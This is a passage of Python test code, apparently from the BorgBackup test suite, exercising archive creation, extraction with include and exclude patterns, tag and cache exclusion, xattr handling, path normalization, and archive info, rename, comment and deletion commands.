        self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
    """Test regular-expression (re:) exclusion patterns, alone and mixed with fnmatch."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    self.create_regular_file('file3', size=1024 * 80)
    self.create_regular_file('file4', size=1024 * 80)
    self.create_regular_file('file333', size=1024 * 80)
    # Create with regular expression exclusion for file4
    self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
    shutil.rmtree('output/input')
    # Extract with regular expression exclusion
    with changedir('output'):
        # 'file3+' matches both file3 and file333
        self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
    shutil.rmtree('output/input')
    # Combine --exclude with fnmatch and regular expression
    with changedir('output'):
        self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
    shutil.rmtree('output/input')
    # Combine --exclude-from and regular expression exclusion
    with changedir('output'):
        # the backreference pattern file(\d)\1\1$ matches file333 (repeated digit)
        self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
                 '--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
    """Test regex and fnmatch exclusion patterns read from an --exclude-from file."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    self.create_regular_file('file3', size=1024 * 80)
    self.create_regular_file('file4', size=1024 * 80)
    self.create_regular_file('file333', size=1024 * 80)
    # file name containing ':' exercises pattern-style prefix parsing (fm:)
    self.create_regular_file('aa:something', size=1024 * 80)
    # Create while excluding using mixed pattern styles
    with open(self.exclude_file_path, 'wb') as fd:
        fd.write(b're:input/file4$\n')
        fd.write(b'fm:*aa:*thing\n')
    self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
    shutil.rmtree('output/input')
    # Exclude using regular expression
    with open(self.exclude_file_path, 'wb') as fd:
        fd.write(b're:file3+\n')
    with changedir('output'):
        self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
    shutil.rmtree('output/input')
    # Mixed exclude pattern styles
    with open(self.exclude_file_path, 'wb') as fd:
        fd.write(b're:file(\\d)\\1\\1$\n')
        fd.write(b'fm:nothingwillmatchthis\n')
        fd.write(b'*/file1\n')
        fd.write(b're:file2$\n')
    with changedir('output'):
        self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
    """Test positional extraction patterns (re:/fm:/plain), alone and combined with --exclude."""
    self.cmd("init", '--encryption=repokey', self.repository_location)
    self.create_regular_file("file1", size=1024 * 80)
    self.create_regular_file("file2", size=1024 * 80)
    self.create_regular_file("file3", size=1024 * 80)
    self.create_regular_file("file4", size=1024 * 80)
    self.create_regular_file("file333", size=1024 * 80)
    self.cmd("create", self.repository_location + "::test", "input")
    # Extract everything with regular expression
    with changedir("output"):
        self.cmd("extract", self.repository_location + "::test", "re:.*")
    self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
    shutil.rmtree("output/input")
    # Extract with pattern while also excluding files
    with changedir("output"):
        # exclusion wins over the positional include pattern
        self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
    self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
    shutil.rmtree("output/input")
    # Combine --exclude with pattern for extraction
    with changedir("output"):
        self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
    self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
    shutil.rmtree("output/input")
    # Multiple pattern
    with changedir("output"):
        self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
    self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
    """Test that extract only lists extracted files when --list is given.

    Neither the default verbosity nor --info alone may print per-file lines.
    """
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file', size=1024 * 80)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        output = self.cmd('extract', self.repository_location + '::test')
    self.assert_not_in("input/file", output)
    shutil.rmtree('output/input')
    with changedir('output'):
        output = self.cmd('extract', '--info', self.repository_location + '::test')
    self.assert_not_in("input/file", output)
    shutil.rmtree('output/input')
    with changedir('output'):
        output = self.cmd('extract', '--list', self.repository_location + '::test')
    self.assert_in("input/file", output)
    shutil.rmtree('output/input')
    with changedir('output'):
        output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
    self.assert_in("input/file", output)
def test_extract_progress(self):
    """Test that extract --progress emits progress output."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file', size=1024 * 80)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        output = self.cmd('extract', self.repository_location + '::test', '--progress')
        assert 'Extracting:' in output
def _create_test_caches(self):
    """Set up a repo and input tree with three CACHEDIR.TAG-style cache dirs.

    cache1: valid tag (content starts with the signature); cache2: invalid
    signature; cache3: hardlink to cache1's tag file (also valid).
    """
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
                             contents=CACHE_TAG_CONTENTS + b' extra stuff')
    self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
                             contents=b'invalid signature')
    os.mkdir('input/cache3')
    os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
def test_create_stdin(self):
    """Test archiving data piped in via stdin ('-' as path).

    The resulting item is named 'stdin', owned by uid/gid 0, and must round-trip
    byte-for-byte through extract --stdout.
    """
    self.cmd('init', '--encryption=repokey', self.repository_location)
    input_data = b'\x00foo\n\nbar\n \n'
    self.cmd('create', self.repository_location + '::test', '-', input=input_data)
    item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
    assert item['uid'] == 0
    assert item['gid'] == 0
    assert item['size'] == len(input_data)
    assert item['path'] == 'stdin'
    extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
    assert extracted_data == input_data
def test_create_without_root(self):
    """test create without a root"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # no path and no --pattern root given -> usage error (exit code 2)
    self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
    """test create with only a root pattern"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    # 'R input' supplies the recursion root via --pattern instead of a positional path
    output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
    self.assert_in("A input/file1", output)
    self.assert_in("A input/file2", output)
def test_create_pattern(self):
    """test file patterns during create"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    self.create_regular_file('file_important', size=1024 * 80)
    # earlier include (+) takes precedence over the later broad exclude (-)
    output = self.cmd('create', '-v', '--list',
                      '--pattern=+input/file_important', '--pattern=-input/file*',
                      self.repository_location + '::test', 'input')
    # 'A' = added, 'x' = excluded in the --list status output
    self.assert_in("A input/file_important", output)
    self.assert_in('x input/file1', output)
    self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
    """test file patterns during create"""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    self.create_regular_file('otherfile', size=1024 * 80)
    self.create_regular_file('file_important', size=1024 * 80)
    # combines a command-line --pattern with patterns loaded via --patterns-from
    # (self.patterns_file_path is prepared by the test fixture)
    output = self.cmd('create', '-v', '--list',
                      '--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
                      self.repository_location + '::test', 'input')
    self.assert_in("A input/file_important", output)
    self.assert_in('x input/file1', output)
    self.assert_in('x input/file2', output)
    self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
    """test when patterns exclude a parent folder, but include a child"""
    self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
    with open(self.patterns_file_path2, 'wb') as fd:
        # '-' excludes but still recurses, so the '+' include for x/b can match inside
        fd.write(b'+ input/x/b\n- input/x*\n')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('x/a/foo_a', size=1024 * 80)
    self.create_regular_file('x/b/foo_b', size=1024 * 80)
    self.create_regular_file('y/foo_y', size=1024 * 80)
    output = self.cmd('create', '-v', '--list',
                      '--patterns-from=' + self.patterns_file_path2,
                      self.repository_location + '::test', 'input')
    self.assert_in('x input/x/a/foo_a', output)
    self.assert_in("A input/x/b/foo_b", output)
    self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
    """test when patterns exclude a parent folder, but include a child"""
    self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
    with open(self.patterns_file_path2, 'wb') as fd:
        # '!' excludes without recursing, so nothing under input/x* is even visited
        fd.write(b'+ input/x/b\n! input/x*\n')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('x/a/foo_a', size=1024 * 80)
    self.create_regular_file('x/b/foo_b', size=1024 * 80)
    self.create_regular_file('y/foo_y', size=1024 * 80)
    output = self.cmd('create', '-v', '--list',
                      '--patterns-from=' + self.patterns_file_path2,
                      self.repository_location + '::test', 'input')
    self.assert_not_in('input/x/a/foo_a', output)
    self.assert_not_in('input/x/a', output)
    self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
    """test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
    self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
    with open(self.patterns_file_path2, 'wb') as fd:
        fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('x/a/foo_a', size=1024 * 80)
    self.create_regular_file('x/b/foo_b', size=1024 * 80)
    with changedir('input'):
        self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
                 self.repository_location + '::test', '.')
    # list the archive and verify that the "intermediate" folders appear before
    # their contents
    out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
    out_list = out.splitlines()
    # 'd' lines are directories, '-' lines are regular files
    self.assert_in('d x/a', out_list)
    self.assert_in('d x/b', out_list)
    assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
    assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
def test_create_no_cache_sync(self):
    """Test create --no-cache-sync: stats must match a cache-synced info run
    and the repo must remain consistent (info + check succeed)."""
    self.create_test_files()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # drop the local cache so create runs without a synced chunks cache
    self.cmd('delete', '--cache-only', self.repository_location)
    create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
                                      '--json', '--error'))  # ignore experimental warning
    info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
    create_stats = create_json['cache']['stats']
    info_stats = info_json['cache']['stats']
    assert create_stats == info_stats
    self.cmd('delete', '--cache-only', self.repository_location)
    self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
    self.cmd('info', self.repository_location)
    self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
    """Test --pattern on extract: include overrides a later broad exclude."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    self.create_regular_file('file_important', size=1024 * 80)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        self.cmd('extract',
                 '--pattern=+input/file_important', '--pattern=-input/file*',
                 self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
    """Extract the archive and assert that only the invalid-signature cache dir
    (cache2) survived cache exclusion; see _create_test_caches."""
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
    self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
    """Test create --exclude-caches (CACHEDIR.TAG detection)."""
    self._create_test_caches()
    self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
    self._assert_test_caches()
def test_recreate_exclude_caches(self):
    """Test recreate --exclude-caches on an archive created without exclusion."""
    self._create_test_caches()
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
    self._assert_test_caches()
def _create_test_tagged(self):
    """Set up a repo and input tree with tag files/dirs for --exclude-if-present tests."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('tagged1/.NOBACKUP')
    self.create_regular_file('tagged2/00-NOBACKUP')
    # tag name used as a directory: must still trigger exclusion of tagged3
    self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
    """Extract and assert that all tagged directories were excluded; see _create_test_tagged."""
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
    """Test create --exclude-if-present with multiple tag names."""
    self._create_test_tagged()
    self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
    self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
    """Test recreate --exclude-if-present on an archive created without exclusion."""
    self._create_test_tagged()
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
             self.repository_location + '::test')
    self._assert_test_tagged()
def _create_test_keep_tagged(self):
    """Set up a repo and input tree for --keep-exclude-tags tests.

    Each tagged dir mixes a tag (file, dir, or CACHEDIR.TAG) with payload
    files; 'taggedall' carries all three tag kinds at once.
    """
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file0', size=1024)
    self.create_regular_file('tagged1/.NOBACKUP1')
    self.create_regular_file('tagged1/file1', size=1024)
    self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
    self.create_regular_file('tagged2/file2', size=1024)
    self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
                             contents=CACHE_TAG_CONTENTS + b' extra stuff')
    self.create_regular_file('tagged3/file3', size=1024)
    self.create_regular_file('taggedall/.NOBACKUP1')
    self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
    self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
                             contents=CACHE_TAG_CONTENTS + b' extra stuff')
    self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
    """Extract and assert that tag files were kept but the payload next to them
    was excluded; see _create_test_keep_tagged."""
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
    self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
    self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
    self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
    self.assert_equal(sorted(os.listdir('output/input/taggedall')),
                      ['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
    """Test create with --keep-exclude-tags: tag files survive, payload does not."""
    self._create_test_keep_tagged()
    self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
             '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
    self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
    """Test recreate with --keep-exclude-tags on an archive created without exclusion."""
    self._create_test_keep_tagged()
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
             '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
    self._assert_test_keep_tagged()
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
    """Test that the security.capability xattr is restored on extraction."""
    fchown = os.fchown
    # We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
    # accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
    def patched_fchown(fd, uid, gid):
        # mimic the kernel: chown clears the capability xattr before changing ownership
        xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
        fchown(fd, uid, gid)
    # The capability descriptor used here is valid and taken from a /usr/bin/ping
    capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
    self.create_regular_file('file')
    xattr.setxattr(b'input/file', b'security.capability', capabilities)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        with patch.object(os, 'fchown', patched_fchown):
            self.cmd('extract', self.repository_location + '::test')
            # extraction must re-apply the capability xattr after chown cleared it
            assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
                                                     'fakeroot')
def test_extract_xattrs_errors(self):
    """Test extract's handling of setxattr() failures.

    E2BIG and ENOTSUP must produce a warning (EXIT_WARNING) with a specific
    message; EACCES must also warn but still leave the extracted file in place.
    """
    def patched_setxattr_E2BIG(*args, **kwargs):
        raise OSError(errno.E2BIG, 'E2BIG')
    def patched_setxattr_ENOTSUP(*args, **kwargs):
        raise OSError(errno.ENOTSUP, 'ENOTSUP')
    def patched_setxattr_EACCES(*args, **kwargs):
        raise OSError(errno.EACCES, 'EACCES')
    self.create_regular_file('file')
    xattr.setxattr(b'input/file', b'user.attribute', b'value')
    # fix: was "'-e' 'none'" (accidental adjacent-string concatenation to '-enone');
    # argparse happens to parse that, but two separate arguments are the clear intent.
    self.cmd('init', self.repository_location, '-e', 'none')
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        input_abspath = os.path.abspath('input/file')
        with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
            out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
            assert '>: Value or key of extended attribute user.attribute is too big for this filesystem\n' in out
        os.remove(input_abspath)
        with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
            out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
            assert '>: Extended attributes are not supported on this filesystem\n' in out
        os.remove(input_abspath)
        with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
            out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
            assert '>: Permission denied when setting extended attribute user.attribute\n' in out
        # EACCES on the xattr must not prevent the file itself from being extracted
        assert os.path.isfile(input_abspath)
def test_path_normalization(self):
    """Test that '..' and redundant components are normalized out of archived paths."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('dir1/dir2/file', size=1024 * 80)
    with changedir('input/dir1/dir2'):
        # convoluted relative path that resolves back to input/dir1/dir2
        self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
    output = self.cmd('list', self.repository_location + '::test')
    self.assert_not_in('..', output)
    self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
    """Test that exclude patterns are normalized the same way as archived paths
    ('file1', './file1' and 'input/./file1' must all exclude the same file)."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('file2', size=1024 * 80)
    with changedir('input'):
        self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test1')
    self.assert_equal(sorted(os.listdir('output')), ['file2'])
    with changedir('input'):
        self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test2')
    self.assert_equal(sorted(os.listdir('output')), ['file2'])
    self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test3')
    self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
    """Test that passing the same path twice to create does not error out."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input', 'input')
def test_overwrite(self):
    """Test extraction over pre-existing paths of mismatched type.

    A file over a directory (and vice versa) is replaced; a non-empty
    directory in the way must make extract fail (exit code 1).
    """
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('dir2/file2', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    # Overwriting regular files and directories should be supported
    os.mkdir('output/input')
    os.mkdir('output/input/file1')
    os.mkdir('output/input/dir2')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    self.assert_dirs_equal('input', 'output/input')
    # But non-empty dirs should fail
    os.unlink('output/input/file1')
    os.mkdir('output/input/file1')
    os.mkdir('output/input/file1/dir')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
    """Test archive rename: old names disappear, new names are extractable,
    and the manifest reflects exactly the renamed archives."""
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('dir2/file2', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('create', self.repository_location + '::test.2', 'input')
    self.cmd('extract', '--dry-run', self.repository_location + '::test')
    self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
    self.cmd('rename', self.repository_location + '::test', 'test.3')
    self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
    self.cmd('rename', self.repository_location + '::test.2', 'test.4')
    self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
    self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
    # Make sure both archives have been renamed
    with Repository(self.repository_path) as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
    self.assert_equal(len(manifest.archives), 2)
    self.assert_in('test.3', manifest.archives)
    self.assert_in('test.4', manifest.archives)
def test_info(self):
    """Test 'borg info' on the whole repository and on a single archive
    (addressed both by name and via --first 1)."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    repo_info = self.cmd('info', self.repository_location)
    assert 'All archives:' in repo_info
    # the same archive, selected two different ways, yields the same header line
    for selector in ((self.repository_location + '::test',),
                     ('--first', '1', self.repository_location)):
        archive_info = self.cmd('info', *selector)
        assert 'Archive name: test\n' in archive_info
def test_info_json(self):
    """Test the structure and types of 'borg info --json' output for both the
    repository and a single archive."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
    repository = info_repo['repository']
    # repository id is a 64-char hex string
    assert len(repository['id']) == 64
    assert 'last_modified' in repository
    assert datetime.strptime(repository['last_modified'], ISO_FORMAT)  # must not raise
    assert info_repo['encryption']['mode'] == 'repokey'
    # repokey mode stores the key in the repo, so no 'keyfile' entry
    assert 'keyfile' not in info_repo['encryption']
    cache = info_repo['cache']
    stats = cache['stats']
    assert all(isinstance(o, int) for o in stats.values())
    assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
    info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
    # repository/cache sections must be identical in repo-level and archive-level output
    assert info_repo['repository'] == info_archive['repository']
    assert info_repo['cache'] == info_archive['cache']
    archives = info_archive['archives']
    assert len(archives) == 1
    archive = archives[0]
    assert archive['name'] == 'test'
    assert isinstance(archive['command_line'], list)
    assert isinstance(archive['duration'], float)
    assert len(archive['id']) == 64
    assert 'stats' in archive
    assert datetime.strptime(archive['start'], ISO_FORMAT)
    assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
    """Test archive comments: set on create, then add/modify/delete/preserve via recreate."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test1', 'input')
    self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
    self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
    self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
    assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
    assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
    self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
    self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
    # empty --comment deletes the comment
    self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
    # recreate without --comment ('12345' is just a path filter) keeps the comment
    self.cmd('recreate', self.repository_location + '::test4', '12345')
    assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
    assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
    assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
    assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
    """Test archive deletion by prefix, by --last, by name, and with --stats;
    afterwards only the manifest object remains in the repository."""
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('dir2/file2', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('create', self.repository_location + '::test.2', 'input')
    self.cmd('create', self.repository_location + '::test.3', 'input')
    self.cmd('create', self.repository_location + '::another_test.1', 'input')
    self.cmd('create', self.repository_location + '::another_test.2', 'input')
    self.cmd('extract', '--dry-run', self.repository_location + '::test')
    self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
    # removes another_test.1 and another_test.2
    self.cmd('delete', '--prefix', 'another_', self.repository_location)
    # removes the most recent remaining archive (test.3)
    self.cmd('delete', '--last', '1', self.repository_location)
    self.cmd('delete', self.repository_location + '::test')
    self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
    output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
    self.assert_in('Deleted data:', output)
    # Make sure all data except the manifest has been deleted
    with Repository(self.repository_path) as repository:
        self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
    """Test deleting several archives in one invocation; remaining archives
    stay extractable until they are deleted as well."""
    self.create_regular_file('file1', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    for archive_name in ('test1', 'test2', 'test3'):
        self.cmd('create', self.repository_location + '::' + archive_name, 'input')
    self.cmd('delete', self.repository_location + '::test1', 'test2')
    self.cmd('extract', '--dry-run', self.repository_location + '::test3')
    self.cmd('delete', self.repository_location, 'test3')
    # no archives left -> empty listing
    assert not self.cmd('list', self.repository_location)
def test_delete_repo(self):
    """Test whole-repository deletion and the BORG_DELETE_I_KNOW_WHAT_I_AM_DOING guard."""
    self.create_regular_file('file1', size=1024 * 80)
    self.create_regular_file('dir2/file2', size=1024 * 80)
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('create', self.repository_location + '::test.2', 'input')
    # answering anything but YES must abort with an error and keep the repo
    os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
    self.cmd('delete', self.repository_location, exit_code=2)
    assert os.path.exists(self.repository_path)
    os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
    self.cmd('delete', self.repository_location)
    # Make sure the repo is gone
    self.assertFalse(os.path.exists(self.repository_path))
def test_delete_force(self):
    """Test delete --force on an archive whose first file chunk is missing.

    Deletion must still succeed (reporting corruption) and leave a repo that
    'check --repair' can clean up.
    """
    self.cmd('init', '--encryption=none', self.repository_location)
    self.create_src_archive('test')
    with Repository(self.repository_path, exclusive=True) as repository:
        manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
        archive = Archive(repository, key, manifest, 'test')
        # corrupt the archive: drop the first data chunk of the first chunked item
        for item in archive.iter_items():
            if 'chunks' in item:
                first_chunk_id = item.chunks[0].id
                repository.delete(first_chunk_id)
                repository.commit(compact=False)
                break
    output = self.cmd('delete', '--force', self.repository_location + '::test')
